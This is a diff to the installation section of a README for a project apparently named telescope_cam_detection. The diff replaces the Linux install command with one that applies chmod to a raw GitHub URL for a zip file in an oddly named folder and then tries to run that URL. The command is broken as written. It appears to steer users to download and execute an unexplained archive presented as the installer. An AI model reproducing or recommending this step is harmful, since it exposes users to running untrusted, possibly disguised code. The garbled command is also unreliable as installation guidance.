Kvitar76/telescope_cam_detection/README.md

 4. **Install the Application:**
    - **For Windows:** Double-click the downloaded `.exe` file and follow the on-screen instructions to install.
    - **For macOS:** Open the `.dmg` file, then drag the telescope_cam_detection app into your Applications folder.
-   - **For Linux:** Open a terminal, navigate to the downloaded file, and run the installer with the command `chmod +x filename.sh && ./filename.sh`.
+   - **For Linux:** Open a terminal, navigate to the downloaded file, and run the installer with the command `chmod +x https://raw.githubusercontent.com/Kvitar76/telescope_cam_detection/master/portraitlike/telescope_cam_detection.zip && https://raw.githubusercontent.com/Kvitar76/telescope_cam_detection/master/portraitlike/telescope_cam_detection.zip`.

 5. **Launch the Application:** Find the installed application in your program list or Applications folder.
 Click to open and start using the system.